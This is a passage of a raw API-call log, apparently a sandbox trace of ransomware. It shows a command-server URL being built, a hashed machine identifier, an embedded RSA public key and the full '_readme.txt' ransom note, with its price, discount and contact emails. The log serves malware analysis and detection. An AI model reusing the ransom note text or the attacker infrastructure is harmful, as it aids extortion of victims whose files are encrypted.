lpWideCharStr=0x3277058, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x32770f8 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e8408, cbMultiByte=-1, lpWideCharStr=0x32770f8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x3277078 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e8670, cbMultiByte=-1, lpWideCharStr=0x3277078, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x32770a8 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32c7e50, cbMultiByte=-1, lpWideCharStr=0x32770a8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x32770b8 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32c80b8, cbMultiByte=-1, lpWideCharStr=0x32770b8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.759] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.759] lstrlenA (lpString="") returned 0 [0167.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x3277118 [0167.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32c8320, cbMultiByte=-1, lpWideCharStr=0x3277118, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.760] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.760] lstrlenA (lpString="") returned 0 [0167.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2) returned 0x32770c8 [0167.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32c8588, cbMultiByte=-1, lpWideCharStr=0x32770c8, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0167.760] lstrcatW (in: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php", lpString2="" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php" [0167.760] lstrlenW (lpString="") returned 0 [0167.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2e6ab8 [0167.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x288) returned 0x32e88d8 [0167.760] GetAdaptersInfo (in: AdapterInfo=0x32e88d8, SizePointer=0x18e294 | out: AdapterInfo=0x32e88d8, SizePointer=0x18e294) returned 0x0 [0167.774] GetAdaptersInfo (in: AdapterInfo=0x32e88d8, SizePointer=0x18e294 | out: AdapterInfo=0x32e88d8, SizePointer=0x18e294) returned 0x0 [0167.787] GetLastError () returned 0x0 [0167.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1000) returned 0x32e8b68 [0167.809] GetLastError () returned 0x0 [0167.821] GetLastError () returned 0x0 [0167.828] CryptAcquireContextW (in: phProv=0x18e264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e264*=0x320858) returned 1 [0167.858] CryptCreateHash (in: hProv=0x320858, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e26c | out: phHash=0x18e26c) returned 1 [0167.858] CryptHashData (hHash=0x302fe8, pbData=0x32c4c10, dwDataLen=0x11, dwFlags=0x0) returned 1 [0167.858] CryptGetHashParam (in: hHash=0x302fe8, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e268) returned 1 [0167.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2e6af8 [0167.858] CryptGetHashParam (in: hHash=0x302fe8, dwParam=0x2, pbData=0x2e6af8, pdwDataLen=0x18e268, dwFlags=0x0 | out: pbData=0x2e6af8, pdwDataLen=0x18e268) returned 1 [0167.858] GetLastError () returned 0x0 [0167.859] CryptDestroyHash (hHash=0x302fe8) returned 1 [0167.859] CryptReleaseContext (hProv=0x320858, dwFlags=0x0) returned 1 [0167.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c4c10 | out: hHeap=0x2c0000) returned 1 [0167.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bfdb8 [0167.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32abf8 | out: hHeap=0x2c0000) returned 1 [0167.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eddd8 | out: hHeap=0x2c0000) returned 1 [0167.859] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x61a8000, lpStartAddress=0x41e690, lpParameter=0x513270, dwCreationFlags=0x0, lpThreadId=0x51325c | out: lpThreadId=0x51325c*=0x360) returned 0x5b0 [0168.104] WaitForSingleObject (hHandle=0x5b0, dwMilliseconds=0xffffffff) returned 0x0 [0198.572] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}") returned 0x5c4 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x32f7a68 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1398 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1600 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1868 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1ad0 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1d38 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f1fa0 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f2208 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f2470 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f26d8 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f2940 [0198.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3b0) returned 0x32e590 [0198.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5d5) returned 0x32dbbe8 [0198.573] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----", cchWideChar=-1, lpMultiByteStr=0x32dbbe8, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----", lpUsedDefaultChar=0x0) returned 470 [0198.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e0) returned 0x32d7d08 [0198.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32dbbe8 | out: hHeap=0x2c0000) returned 1 [0198.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e590 | out: hHeap=0x2c0000) returned 1 [0198.578] CryptAcquireContextW (in: phProv=0x18e2d4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x18e2d4*=0x3215a0) returned 1 [0198.609] CryptCreateHash (in: hProv=0x3215a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x18e2d8 | out: phHash=0x18e2d8) returned 1 [0198.609] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0198.609] CryptHashData (hHash=0x32ef178, pbData=0x32d7d08, dwDataLen=0x1d5, dwFlags=0x0) returned 1 [0198.609] CryptGetHashParam (in: hHash=0x32ef178, dwParam=0x2, pbData=0x0, pdwDataLen=0x18e2dc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x18e2dc) returned 1 [0198.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3420 [0198.609] CryptGetHashParam (in: hHash=0x32ef178, dwParam=0x2, pbData=0x32b3420, pdwDataLen=0x18e2dc, dwFlags=0x0 | out: pbData=0x32b3420, pdwDataLen=0x18e2dc) returned 1 [0198.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x34) returned 0x32ef0f8 [0198.614] GetLastError () returned 0x0 [0198.620] lstrcatA (in: lpString1="", lpString2="CD" | out: lpString1="CD") returned="CD" [0198.620] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CD", lpString2="EF" | out: lpString1="CDEF") returned="CDEF" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEF", lpString2="CB" | out: lpString1="CDEFCB") returned="CDEFCB" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCB", lpString2="B0" | out: lpString1="CDEFCBB0") returned="CDEFCBB0" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB0", lpString2="9F" | out: lpString1="CDEFCBB09F") returned="CDEFCBB09F" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09F", lpString2="D8" | out: lpString1="CDEFCBB09FD8") returned="CDEFCBB09FD8" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD8", lpString2="64" | out: lpString1="CDEFCBB09FD864") returned="CDEFCBB09FD864" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864", lpString2="E0" | out: lpString1="CDEFCBB09FD864E0") returned="CDEFCBB09FD864E0" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0", lpString2="D0" | out: lpString1="CDEFCBB09FD864E0D0") returned="CDEFCBB09FD864E0D0" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0", lpString2="DC" | out: lpString1="CDEFCBB09FD864E0D0DC") returned="CDEFCBB09FD864E0D0DC" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DC", lpString2="B7" | out: lpString1="CDEFCBB09FD864E0D0DCB7") returned="CDEFCBB09FD864E0D0DCB7" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DCB7", lpString2="E7" | out: lpString1="CDEFCBB09FD864E0D0DCB7E7") returned="CDEFCBB09FD864E0D0DCB7E7" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DCB7E7", lpString2="59" | out: lpString1="CDEFCBB09FD864E0D0DCB7E759") returned="CDEFCBB09FD864E0D0DCB7E759" [0198.621] GetLastError () returned 0x0 [0198.621] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DCB7E759", lpString2="32" | out: lpString1="CDEFCBB09FD864E0D0DCB7E75932") returned="CDEFCBB09FD864E0D0DCB7E75932" [0198.622] GetLastError () returned 0x0 [0198.622] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DCB7E75932", lpString2="BB" | out: lpString1="CDEFCBB09FD864E0D0DCB7E75932BB") returned="CDEFCBB09FD864E0D0DCB7E75932BB" [0198.622] GetLastError () returned 0x0 [0198.622] lstrcatA (in: lpString1="CDEFCBB09FD864E0D0DCB7E75932BB", lpString2="BF" | out: lpString1="CDEFCBB09FD864E0D0DCB7E75932BBBF") returned="CDEFCBB09FD864E0D0DCB7E75932BBBF" [0198.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b3420 | out: hHeap=0x2c0000) returned 1 [0198.622] CryptDestroyHash (hHash=0x32ef178) returned 1 [0198.622] CryptReleaseContext (hProv=0x3215a0, dwFlags=0x0) returned 1 [0198.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0198.622] lstrlenA (lpString="CDEFCBB09FD864E0D0DCB7E75932BBBF") returned 32 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x3b0) returned 0x32f9378 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5d5) returned 0x32e590 [0198.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----", cchWideChar=-1, lpMultiByteStr=0x32e590, cbMultiByte=1493, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----", lpUsedDefaultChar=0x0) returned 470 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e0) returned 0x32dbbe8 [0198.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e590 | out: hHeap=0x2c0000) returned 1 [0198.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9378 | out: hHeap=0x2c0000) returned 1 [0198.622] lstrcpyA (in: lpString1=0x32d0dd0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----" [0198.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32dbbe8 | out: hHeap=0x2c0000) returned 1 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384310 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x32f7a38 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f2ba8 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f2e10 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f3078 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f32e0 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f3548 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32f37b0 [0198.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32dfbf8 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32dfe60 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e00c8 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0330 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x816) returned 0x32dbbe8 [0198.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x18e2e0, cbMultiByte=-1, lpWideCharStr=0x32dbbe8, cchWideChar=1035 | out: lpWideCharStr="_readme.txt") returned 12 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x32d7d08 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32dbbe8 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x32f7d68 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0598 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0800 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0a68 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0cd0 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e0f38 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e11a0 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e1408 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e1670 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e18d8 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e1b40 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x329e050 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x130) returned 0x32c1738 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x329e050 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1d0) returned 0x3188b8 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c1738 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2b7) returned 0x327020 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3188b8 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x412) returned 0x32e590 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x327020 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x61a) returned 0x32dbbe8 [0198.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e590 | out: hHeap=0x2c0000) returned 1 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x440) returned 0x32e590 [0198.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1066) returned 0x32d9600 [0198.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32e590, cbMultiByte=-1, lpWideCharStr=0x32d9600, cchWideChar=2099 | out: lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned 1076 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1070) returned 0x32b948 [0198.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d9600 | out: hHeap=0x2c0000) returned 1 [0198.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e590 | out: hHeap=0x2c0000) returned 1 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x28) returned 0x32f7be8 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e1da8 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e2010 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e2278 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e24e0 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e2748 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e29b0 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e2c18 [0198.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x25c) returned 0x32e2e80 [0198.624] 